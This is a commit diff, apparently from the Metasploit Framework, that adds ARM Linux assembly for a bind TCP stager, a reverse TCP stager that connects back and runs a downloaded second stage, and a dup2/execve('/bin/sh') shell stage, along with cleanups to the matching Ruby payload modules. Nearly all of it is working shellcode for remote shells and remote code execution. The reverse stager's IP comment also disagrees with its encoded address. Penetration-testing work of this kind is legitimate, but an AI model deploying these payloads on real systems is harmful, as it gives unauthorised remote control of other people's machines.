Merge pull request #1 from jvazquez-r7/arm_stagers

dcbz · dcbz · commit 8b8fb9f5ae37 · 2013-05-29T13:07:46.000-07:00
ARM stagers cleanup
diff --git a/external/source/shellcode/linux/armle/stage_shell.s b/external/source/shellcode/linux/armle/stage_shell.s
@@ -0,0 +1,34 @@
+@@
+@
+@        Name: generic
+@   Qualities: -
+@     Authors: nemo <nemo [at] felinemenace.org>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        dup2 / execve("/bin/sh") stage for Linux ARM LE architecture.
+@@
+
+.text
+.globl _start
+_start:
+int dup2(int oldfd, int newfd);
+	mov r7,#63       ; __NR_dup2
+	mov r1,#3
+up:
+	mov r0,r12       ; oldfd (descriptor stored in r12 by the stager)
+	sub r1,#1        ; newfd
+	swi 0
+	cmp r1,#1
+	bge up
+@ execve(const char *path, char *const argv[], char *const envp[]);
+	mov r7,#11       ; __NR_execve
+	add r0,pc,#24    ; *path
+	sub sp,#24
+	str r0,[sp,#-20]
+	mov r2,#0
+	str r2,[sp,#-16] 	
+	add r1,sp,#-20   ; *argv[]
+	mov r2,r1        ; *envp[]
+	swi 0
+.string "/bin/sh"
diff --git a/external/source/shellcode/linux/armle/stager_sock_bind.s b/external/source/shellcode/linux/armle/stager_sock_bind.s
@@ -0,0 +1,101 @@
+@@
+@
+@        Name: stager_sock_bind
+@   Qualities: -
+@     Authors: nemo <nemo [at] felinemenace.org>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux portbind TCP stager for ARM LE architecture.
+@
+@        Socket descriptor in r12.
+@
+@        Assemble with: as stager_sock_bind.s -o stager_sock_bind.o
+@        Link with:     ld stager_sock_bind.o -o stager_sock_bind
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Bind TCP Stager
+@ meta-description=Listen on a port for a connection and run a second stage
+@ meta-authors=nemo <nemo [at] felinemenace.org>
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=stager
+@ meta-connection-type=bind
+@ meta-name=bind_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+	ldr r7,=281        @ __NR_socket
+    mov r0,#2          @ domain   = AF_INET
+	mov r1,#1          @ type     = SOCK_STREAM
+	mov r2,#6          @ protocol = IPPROTO_TCP
+	swi 0
+@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+    mov r12,r0         @ sockfd
+	add r7,#1          @ __NR_bind
+	add r1,pc,#176     @ *addr
+	mov r2,#16         @ addrlen
+	swi 0
+@ int listen(int sockfd, int backlog);
+	add r7,#2          @ __NR_listen
+	mov r0,r12         @ sockfd
+	swi 0
+@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+	add r7,#1          @ __NR_accept
+	mov r0,r12         @ sockfd
+	sub r1,r1,r1       @ *addr    = NULL
+	mov r2,r1          @ *addrlen = NULL
+	swi 0
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+    mov r12,r0         @ sockfd
+	sub sp,#4
+	add r7,#6          @ __NR_recv
+	mov r1,sp          @ *buf (on the stack)
+	mov r2,#4          @ len
+	mov r3,#0          @ flags
+	swi 0
+@ round length
+	ldr r1,[sp,#0]
+	ldr r3,=0xfffff000
+	and r1,r1,r3
+	mov r2,#1
+	lsl r2,#12
+@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
+	add r1,r2          @ length
+	mov r7, #192       @ __NR_mmap2
+	ldr r0,=0xffffffff @ *addr = NULL
+    mov r2,#7          @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
+    ldr r3,=0x1022     @ flags = MAP_ANON | MAP_PRIVATE
+	mov r4,r0          @ fd
+	mov r5,#0          @ pgoffset
+	swi 0
+@ recv loop
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+	add r7,#99         @ __NR_recv
+	mov r1,r0          @ *buf
+	mov r0,r12         @ sockfd
+	mov r3,#0          @ flags
+@ remove blocksize from total length
+loop:
+	ldr r2,[sp,#0]
+	sub r2,#1000
+	str r2,[sp,#0]
+	cmp r2, #0
+	ble last
+	mov r2,#1000       @ len
+	swi 0	
+	b loop
+last:
+	add r2,#1000       @ len
+	swi 0
+@ branch to code
+	mov pc,r1
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002 
+@ ip
+.word   0x00000000 
diff --git a/external/source/shellcode/linux/armle/stager_sock_reverse.s b/external/source/shellcode/linux/armle/stager_sock_reverse.s
@@ -0,0 +1,92 @@
+@@
+@
+@        Name: stager_sock_reverse
+@   Qualities: -
+@     Authors: nemo <nemo [at] felinemenace.org>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux reverse TCP stager for ARM LE architecture.
+@
+@        Socket descriptor in r12.
+@
+@        Assemble with: as stager_sock_reverse.s -o stager_sock_reverse.o
+@        Link with:     ld stager_sock_reverse.o -o stager_sock_reverse
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Reverse TCP Stager
+@ meta-description=Connect back to the framework and run a second stage
+@ meta-authors=nemo <nemo [at] felinemenace.org>
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=stager
+@ meta-connection-type=reverse
+@ meta-name=reverse_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+	ldr r7,=281        @ __NR_socket
+	mov r0,#2          @ domain   = AF_INET
+	mov r1,#1          @ type     = SOCK_STREAM
+	mov r2,#6          @ protocol = IPPROTO_TCP
+	swi 0
+@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+    mov r12,r0         @ sockfd
+	add r7,#2          @ __NR_socket
+	add r1,pc,#144     @ *addr
+	mov r2,#16         @ addrlen
+	swi 0
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+    mov r0,r12         @ sockfd
+	sub sp,#4
+	add r7,#8          @ __NR_recv
+	mov r1,sp          @ *buf (on the stack)
+	mov r2,#4          @ len
+	mov r3,#0          @ flags
+	swi 0
+@ round length
+	ldr r1,[sp,#0]
+	ldr r3,=0xfffff000
+	and r1,r1,r3
+	mov r2,#1
+	lsl r2,#12
+@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
+	add r1,r2          @ length
+	mov r7, #192       @ __NR_mmap2
+	ldr r0,=0xffffffff @ *addr = NULL
+	mov r2,#7          @ prot  = PROT_READ | PROT_WRITE | PROT_EXEC
+    ldr r3,=0x1022     @ flags = MAP_ANON | MAP_PRIVATE
+	mov r4,r0          @ fd
+	mov r5,#0          @ pgoffset
+	swi 0
+@ recv loop
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+	add r7,#99         @ __NR_recv
+	mov r1,r0          @ *buf
+	mov r0,r12         @ sockfd
+	mov r3,#0          @ flags
+@ remove blocksize from total length
+loop:
+	ldr r2,[sp,#0]
+	sub r2,#1000
+	str r2,[sp,#0]
+	cmp r2, #0
+	ble last
+	mov r2,#1000       @ len
+	swi 0	
+	b loop
+last:
+	add r2,#1000       @ len
+	swi 0
+@ branch to code
+	mov pc,r1
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002 
+@ ip: 127.0.0.1
+.word   0x01aca8c0
+@.word   0x0100007f
diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb
@@ -26,7 +26,7 @@ def initialize(info = {})
 		super(merge_info(info,
 			'Name'          => 'Bind TCP Stager',
 			'Description'   => 'Listen for a connection',
-			'Author'        => 'nemo@felinemenace.org',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'linux',
 			'Arch'          => ARCH_ARMLE,
@@ -39,14 +39,14 @@ def initialize(info = {})
 						},
 					'Payload' =>
 					[
-						0xe59f70d4,           # ldr     r7, [pc, #212]  ; 8130 <last+0x14>
+						0xe59f70d4,           # ldr     r7, [pc, #212]
 						0xe3a00002,           # mov     r0, #2
 						0xe3a01001,           # mov     r1, #1
 						0xe3a02006,           # mov     r2, #6
 						0xef000000,           # svc     0x00000000
 						0xe1a0c000,           # mov     ip, r0
 						0xe2877001,           # add     r7, r7, #1
-						0xe28f10b0,           # add     r1, pc, #176    ; 0xb0
+						0xe28f10b0,           # add     r1, pc, #176
 						0xe3a02010,           # mov     r2, #16
 						0xef000000,           # svc     0x00000000
 						0xe2877002,           # add     r7, r7, #2
@@ -65,31 +65,31 @@ def initialize(info = {})
 						0xe3a03000,           # mov     r3, #0
 						0xef000000,           # svc     0x00000000
 						0xe59d1000,           # ldr     r1, [sp]
-						0xe59f3070,           # ldr     r3, [pc, #112]  ; 8134 <last+0x18>
+						0xe59f3070,           # ldr     r3, [pc, #112]
 						0xe0011003,           # and     r1, r1, r3
 						0xe3a02001,           # mov     r2, #1
 						0xe1a02602,           # lsl     r2, r2, #12
 						0xe0811002,           # add     r1, r1, r2
-						0xe3a070c0,           # mov     r7, #192        ; 0xc0
+						0xe3a070c0,           # mov     r7, #192
 						0xe3e00000,           # mvn     r0, #0
 						0xe3a02007,           # mov     r2, #7
-						0xe59f3054,           # ldr     r3, [pc, #84]   ; 8138 <last+0x1c>
+						0xe59f3054,           # ldr     r3, [pc, #84]
 						0xe1a04000,           # mov     r4, r0
 						0xe3a05000,           # mov     r5, #0
 						0xef000000,           # svc     0x00000000
-						0xe2877063,           # add     r7, r7, #99     ; 0x63
+						0xe2877063,           # add     r7, r7, #99
 						0xe1a01000,           # mov     r1, r0
 						0xe1a0000c,           # mov     r0, ip
 						0xe3a03000,           # mov     r3, #0
 						0xe59d2000,           # ldr     r2, [sp]
-						0xe2422ffa,           # sub     r2, r2, #1000   ; 0x3e8
+						0xe2422ffa,           # sub     r2, r2, #1000
 						0xe58d2000,           # str     r2, [sp]
 						0xe3520000,           # cmp     r2, #0
 						0xda000002,           # ble     811c <last>
-						0xe3a02ffa,           # mov     r2, #1000       ; 0x3e8
+						0xe3a02ffa,           # mov     r2, #1000
 						0xef000000,           # svc     0x00000000
 						0xeafffff7,           # b       80fc <loop>
-						0xe2822ffa,           # add     r2, r2, #1000   ; 0x3e8
+						0xe2822ffa,           # add     r2, r2, #1000
 						0xef000000,           # svc     0x00000000
 						0xe1a0f001,           # mov     pc, r1
 						0x5c110002,           # .word   0x5c110002
diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -26,7 +26,7 @@ def initialize(info = {})
 		super(merge_info(info,
 			'Name'          => 'Reverse TCP Stager',
 			'Description'   => 'Connect back to the attacker',
-			'Author'        => 'nemo',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'linux',
 			'Arch'          => ARCH_ARMLE,
@@ -35,19 +35,19 @@ def initialize(info = {})
 				{
 					'Offsets' =>
 						{
-							'LPORT' => [ 194, 'n'    ],
-							'LHOST' => [ 196, 'ADDR' ],
+							'LPORT' => [ 182, 'n'    ],
+							'LHOST' => [ 184, 'ADDR' ],
 						},
 					'Payload' =>
 					[
-						0xe59f70b4,          #  ldr     r7, [pc, #180]  ; 8110 <last+0x14>
+						0xe59f70b4,          #  ldr     r7, [pc, #180]
 						0xe3a00002,          #  mov     r0, #2
 						0xe3a01001,          #  mov     r1, #1
 						0xe3a02006,          #  mov     r2, #6
 						0xef000000,          #  svc     0x00000000
 						0xe1a0c000,          #  mov     ip, r0
 						0xe2877002,          #  add     r7, r7, #2
-						0xe28f1090,          #  add     r1, pc, #144    ; 0x90
+						0xe28f1090,          #  add     r1, pc, #144
 						0xe3a02010,          #  mov     r2, #16
 						0xef000000,          #  svc     0x00000000
 						0xe1a0000c,          #  mov     r0, ip
@@ -58,31 +58,31 @@ def initialize(info = {})
 						0xe3a03000,          #  mov     r3, #0
 						0xef000000,          #  svc     0x00000000
 						0xe59d1000,          #  ldr     r1, [sp]
-						0xe59f3070,          #  ldr     r3, [pc, #112]  ; 8114 <last+0x18>
+						0xe59f3070,          #  ldr     r3, [pc, #112]
 						0xe0011003,          #  and     r1, r1, r3
 						0xe3a02001,          #  mov     r2, #1
 						0xe1a02602,          #  lsl     r2, r2, #12
 						0xe0811002,          #  add     r1, r1, r2
-						0xe3a070c0,          #  mov     r7, #192        ; 0xc0
+						0xe3a070c0,          #  mov     r7, #192
 						0xe3e00000,          #  mvn     r0, #0
 						0xe3a02007,          #  mov     r2, #7
-						0xe59f3054,          #  ldr     r3, [pc, #84]   ; 8118 <last+0x1c>
+						0xe59f3054,          #  ldr     r3, [pc, #84]
 						0xe1a04000,          #  mov     r4, r0
 						0xe3a05000,          #  mov     r5, #0
 						0xef000000,          #  svc     0x00000000
-						0xe2877063,          #  add     r7, r7, #99     ; 0x63
+						0xe2877063,          #  add     r7, r7, #99
 						0xe1a01000,          #  mov     r1, r0
 						0xe1a0000c,          #  mov     r0, ip
 						0xe3a03000,          #  mov     r3, #0
 						0xe59d2000,          #  ldr     r2, [sp]
-						0xe2422ffa,          #  sub     r2, r2, #1000   ; 0x3e8
+						0xe2422ffa,          #  sub     r2, r2, #1000
 						0xe58d2000,          #  str     r2, [sp]
 						0xe3520000,          #  cmp     r2, #0
 						0xda000002,          #  ble     80fc <last>
-						0xe3a02ffa,          #  mov     r2, #1000       ; 0x3e8
+						0xe3a02ffa,          #  mov     r2, #1000
 						0xef000000,          #  svc     0x00000000
 						0xeafffff7,          #  b       80dc <loop>
-						0xe2822ffa,          #  add     r2, r2, #1000   ; 0x3e8
+						0xe2822ffa,          #  add     r2, r2, #1000
 						0xef000000,          #  svc     0x00000000
 						0xe1a0f001,          #  mov     pc, r1
 						0x5c110002,          #  .word   0x5c110002
@@ -96,7 +96,7 @@ def initialize(info = {})
 			))
 	end
 
-def handle_i7	termediate_stage(conn, payload)
+def handle_intermediate_stage(conn, payload)
 
 		print_status("Transmitting stage length value...(#{payload.length} bytes)")
 
diff --git a/modules/payloads/stages/linux/armle/shell.rb b/modules/payloads/stages/linux/armle/shell.rb
@@ -17,7 +17,7 @@ def initialize(info = {})
 		super(merge_info(info,
 			'Name'          => 'Linux dup2 Command Shell',
 			'Description'   => 'dup2 socket in r12, then execve',
-			'Author'        => 'nemo',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'linux',
 			'Arch'          => ARCH_ARMLE,
